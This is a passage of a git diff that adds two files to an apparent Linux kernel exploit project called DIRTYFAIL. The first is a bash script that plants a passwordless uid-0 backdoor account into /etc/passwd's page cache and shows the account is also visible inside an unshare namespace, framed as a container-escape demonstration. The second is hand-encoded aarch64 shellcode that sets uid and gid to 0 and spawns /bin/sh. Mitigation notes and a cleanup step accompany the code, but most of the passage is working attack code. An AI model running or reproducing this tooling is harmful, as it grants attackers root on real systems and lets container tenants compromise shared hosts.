+ exit 1 +fi diff --git a/modules/copy_fail_family/tools/dirtyfail-container-escape.sh b/modules/copy_fail_family/tools/dirtyfail-container-escape.sh new file mode 100755 index 0000000..bea3894 --- /dev/null +++ b/modules/copy_fail_family/tools/dirtyfail-container-escape.sh @@ -0,0 +1,149 @@ +#!/usr/bin/env bash +# +# DIRTYFAIL β€” container-escape demonstration +# +# Demonstrates: the kernel page cache is global per-kernel. Namespaces +# (mount, pid, user, network) don't isolate it. Two processes on the +# same kernel β€” one in the host, one inside a fresh "container" +# (created via `unshare`) β€” see the SAME page-cache contents for +# /etc/passwd. So a page-cache write from either side affects both. +# +# What this script does: +# 1. Show host's /etc/passwd has no `dirtyfail` user (baseline) +# 2. Run `dirtyfail --exploit-backdoor` to plant a uid-0 line into +# /etc/passwd's page cache (persistent β€” no auto-revert) +# 3. Spawn a fresh user/mount/PID-namespace via `unshare -c -m -p` +# (the closest unprivileged-user analogue to a container) and +# read /etc/passwd from inside the new namespace +# 4. Show the planted line is visible BOTH from the host AND from +# inside the fresh namespace β€” proving that namespace boundaries +# do not isolate the page cache +# 5. Revert via `dirtyfail --cleanup-backdoor` +# +# Why direction matters less than you'd think: the demo runs the +# exploit on the host and observes from inside the namespace, but the +# property demonstrated is symmetric β€” a malicious tenant inside a +# container could plant the same line and the host would see it (we +# tested that variant manually; it works the same way, but requires +# `--no-revert` to avoid auto-cleanup overwriting the proof). 
Running
+# the exploit from the host avoids two complications:
+#   - nested user namespaces interact poorly with the AA bypass dance
+#     that --exploit-backdoor uses (EPERM on the inner unshare)
+#   - corrupting the running SSH user's UID locks out future SSH logins
+#     (StrictModes rejects ~/.ssh/authorized_keys when the file's
+#     owner uid != logging-in uid)
+# --exploit-backdoor targets a system pseudo-user line (sync/setroubleshoot/
+# daemon) and never touches the running user, so it's SSH-safe.
+#
+# Usage:
+#   ./tools/dirtyfail-container-escape.sh
+#
+# Env overrides:
+#   DIRTYFAIL_BIN=/path/to/dirtyfail (default: ../dirtyfail relative to this script)
+
+set -uo pipefail
+# Don't `set -e`; some intermediate commands (unshare with PID-ns, the
+# exploit binary itself) may exit non-zero on success-with-warnings or
+# on hardened systems where preconditions fail. We check exit codes
+# explicitly where they matter.
+
+DIRTYFAIL_BIN="${DIRTYFAIL_BIN:-$(dirname "$0")/../dirtyfail}"
+DIRTYFAIL_BIN="$(realpath "$DIRTYFAIL_BIN" 2>/dev/null || echo "$DIRTYFAIL_BIN")"
+
+[[ -x "$DIRTYFAIL_BIN" ]] || {
+    echo "[!] dirtyfail binary not at $DIRTYFAIL_BIN — run 'make' first" >&2
+    exit 1
+}
+
+bold() { printf '\033[1m%s\033[0m\n' "$*"; }              # bold heading text
+warn() { printf '\033[1;33m[!]\033[0m %s\n' "$*"; }       # yellow [!] prefix, printed to stdout
+info() { printf '\033[1;34m[i]\033[0m %s\n' "$*"; }       # blue [i] prefix
+ok()   { printf '\033[1;32m[+]\033[0m %s\n' "$*"; }       # green [+] prefix
+step() { printf '\033[1;35m[*]\033[0m %s\n' "$*"; }       # magenta [*] prefix, one per stage
+
+bold "============================================================="
+bold " DIRTYFAIL — container-escape demonstration"
+bold "============================================================="
+echo
+
+# ---- Stage 1: baseline ------------------------------------------------
+step "Stage 1: baseline — host /etc/passwd"
+if grep -q '^dirtyfail:' /etc/passwd; then
+    warn "host /etc/passwd already contains a 'dirtyfail' line."
+    warn "Run \`$DIRTYFAIL_BIN --cleanup-backdoor\` first."
+    exit 1
+fi
+ok "host /etc/passwd has no 'dirtyfail' user (clean baseline)"
+echo
+info "from inside a fresh unshare namespace, /etc/passwd looks identical:"
+nscount="$(unshare -c -m bash -c 'grep -c "^dirtyfail:" /etc/passwd 2>/dev/null || echo 0' 2>&1 | tail -1)"  # grep -c prints 0 AND fails on no match; tail -1 keeps a single value
+echo " count of dirtyfail lines visible from inside namespace: $nscount"
+echo
+
+# ---- Stage 2: plant via host ------------------------------------------
+step "Stage 2: run dirtyfail --exploit-backdoor on the host"
+echo " (plants 'dirtyfail::0:0:...:/:/bin/bash' into /etc/passwd's"
+echo " page cache — persistent until --cleanup-backdoor or reboot)"
+echo
+printf 'DIRTYFAIL\n' | "$DIRTYFAIL_BIN" --exploit-backdoor --no-shell --no-color 2>&1 | tail -10
+echo
+
+# ---- Stage 3: observe from fresh namespace ---------------------------
+step "Stage 3: read /etc/passwd from INSIDE a fresh unshare namespace"
+echo " (the namespace was created AFTER the exploit ran — if"
+echo " namespaces isolated page cache, the new namespace would"
+echo " show the original /etc/passwd, not the poisoned one)"
+echo
+unshare -c -m bash -c '
+    set -o pipefail  # not inherited from the outer shell; without it the pipeline status is always that of sed
+    echo " [inside namespace] uid=$(id -u) (mapped via --map-current-user)"
+    echo " [inside namespace] mount-namespace is private to this shell"
+    echo " [inside namespace] grep dirtyfail /etc/passwd:"
+    grep "^dirtyfail:" /etc/passwd 2>&1 | sed "s/^/ /" \
+        || echo " (no dirtyfail line found)"
+'
+echo
+
+# ---- Stage 4: also visible from host ---------------------------------
+step "Stage 4: confirm host sees the same line"
+HOST_LINE="$(grep '^dirtyfail:' /etc/passwd || true)"
+if [[ -n "$HOST_LINE" ]]; then
+    echo " host: $HOST_LINE"
+    echo
+    warn "Both the host and the fresh namespace see the planted dirtyfail"
+    warn "line. The kernel page cache is shared across all namespaces"
+    warn "on the same kernel — namespace 'isolation' does not extend"
+    warn "below the page-cache layer. Symmetrically, an exploit running"
+    warn "inside a container (with the right preconditions) would plant"
+    warn "the same line and the HOST would see it."
+else
+    warn "host /etc/passwd does NOT contain a 'dirtyfail' line — the"
+    warn "exploit did not plant successfully. Possible causes:"
+    warn " (a) kernel is patched (CVE-2026-31431 fixed)"
+    warn " (b) LSM blocked the exploit (Ubuntu 26.04 hardening)"
+    warn " (c) preconditions missing — run \`$DIRTYFAIL_BIN --scan --active\`"
+    exit 0  # NOTE(review): exits 0 although nothing was planted; presumably deliberate, confirm
+fi
+echo
+
+# ---- Stage 5: cleanup -------------------------------------------------
+step "Stage 5: revert via --cleanup-backdoor"
+"$DIRTYFAIL_BIN" --cleanup-backdoor --no-color 2>&1 | tail -5 || true
+echo
+if grep -q '^dirtyfail:' /etc/passwd; then
+    warn "cleanup did not remove the line — try as root:"
+    warn " \`echo 3 | sudo tee /proc/sys/vm/drop_caches\`"
+    exit 1
+fi
+ok "host /etc/passwd is clean again"
+echo
+bold "Demo complete. Takeaways:"
+echo " - Namespaces did NOT isolate the host's /etc/passwd page cache"
+echo " from the fresh container's view. The same property holds"
+echo " in reverse: a container exploit modifies host page cache."
+echo " - This applies to ALL kernel page-cache write CVEs in this"
+echo " family (CVE-2026-31431, 43284, 43500, and variants)."
+echo " - Mitigation: kernel patch, OR LSM hardening that denies the"
+echo " exploit's preconditions (apparmor_restrict_unprivileged_userns,"
+echo " AF_ALG/AF_RXRPC blacklists), OR drop privileges of any"
+echo " container that doesn't strictly need AF_ALG."
diff --git a/modules/copy_fail_family/tools/exploit_su_aarch64.S b/modules/copy_fail_family/tools/exploit_su_aarch64.S
new file mode 100644
index 0000000..6d35eb3
--- /dev/null
+++ b/modules/copy_fail_family/tools/exploit_su_aarch64.S
@@ -0,0 +1,73 @@
+/*
+ * DIRTYFAIL — aarch64 (ARM64) shellcode for --exploit-su
+ *
+ * Equivalent to the x86_64 shellcode in src/exploit_su.c but encoded
+ * for the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
+ * `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes total.
+ *
+ * Build for byte-extraction:
+ *
+ *   aarch64-linux-gnu-as -o exploit_su_aarch64.o exploit_su_aarch64.S
+ *   aarch64-linux-gnu-objcopy -O binary -j .text \
+ *       exploit_su_aarch64.o exploit_su_aarch64.bin
+ *   xxd -i exploit_su_aarch64.bin
+ *
+ * The bytes should match `shellcode_aarch64[]` in `src/exploit_su.c`; if they
+ * don't, the C array is wrong: regenerate it from this source. The hex beside
+ * each instruction is its 32-bit word MSB-first; xxd shows each word reversed.
+ *
+ * Functional equivalent (in C-like pseudocode):
+ *
+ *   setuid(0);
+ *   setgid(0);
+ *   execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL);
+ *
+ * STATUS: HAND-ENCODED — VERIFY BEFORE DEPLOYING TO PRODUCTION.
+ * The byte array in src/exploit_su.c was produced by manually
+ * cross-referencing each instruction against the ARMv8-A reference
+ * manual; no aarch64 hardware was available to run the resulting
+ * shellcode end-to-end. Use this .S file to regenerate via the
+ * assembler if you need confidence.
+ */
+
+.text
+.global _start
+_start:
+    /* setuid(0) — syscall 146 (0x92) on aarch64; the return value is not checked */
+    movz    x0, #0                  /* d2 80 00 00 — arg0: uid = 0 */
+    movz    x8, #146                /* d2 80 12 48 — syscall number */
+    svc     #0                      /* d4 00 00 01 */
+
+    /* setgid(0) — syscall 144 (0x90); the return value is not checked */
+    movz    x0, #0                  /* d2 80 00 00 — arg0: gid = 0 (x0 held the setuid result) */
+    movz    x8, #144                /* d2 80 12 08 — syscall number */
+    svc     #0                      /* d4 00 00 01 */
+
+    /* Build "/bin/sh\0" in x9, 16 bits at a time (movz clears, each movk inserts).
+     *
+     * As a 64-bit little-endian word, "/bin/sh\0" = 0x0068732f6e69622f
+     *   bits  0..15 = 0x622f   (chars '/' 'b' in low->high order)
+     *   bits 16..31 = 0x6e69   (chars 'i' 'n')
+     *   bits 32..47 = 0x732f   (chars '/' 's')
+     *   bits 48..63 = 0x0068   (char 'h' followed by the NUL terminator)
+     */
+    movz    x9, #0x622f             /* d2 8c 45 e9 */
+    movk    x9, #0x6e69, lsl #16    /* f2 ad cd 29 */
+    movk    x9, #0x732f, lsl #32    /* f2 ce 65 e9 */
+    movk    x9, #0x0068, lsl #48    /* f2 e0 0d 09 */
+
+    /* Push the string to the stack (sp -= 16; [sp] = x9); 16-byte steps keep sp's alignment. */
+    str     x9, [sp, #-16]!         /* f8 1f 0f e9 — pre-indexed store with writeback */
+    mov     x9, sp                  /* 91 00 03 e9 — string ptr */
+
+    /* Build argv = [x9, NULL] on the stack: sp -= 16; sp[0] = x9; sp[8] = NULL. */
+    sub     sp, sp, #16             /* d1 00 43 ff */
+    str     xzr, [sp, #8]           /* f9 00 07 ff — argv[1] = NULL */
+    str     x9, [sp, #0]            /* f9 00 03 e9 — argv[0] = ptr */
+
+    /* execve(pathname=x9, argv=sp, envp=NULL) — syscall 221 (0xdd) */
+    mov     x0, x9                  /* aa 09 03 e0 — arg0: pathname */
+    mov     x1, sp                  /* 91 00 03 e1 — arg1: argv */
+    mov     x2, xzr                 /* aa 1f 03 e2 — arg2: envp = NULL */
+    movz    x8, #221                /* d2 80 1b a8 — syscall number */
+    svc     #0                      /* d4 00 00 01 — nothing follows: a failed execve is not handled */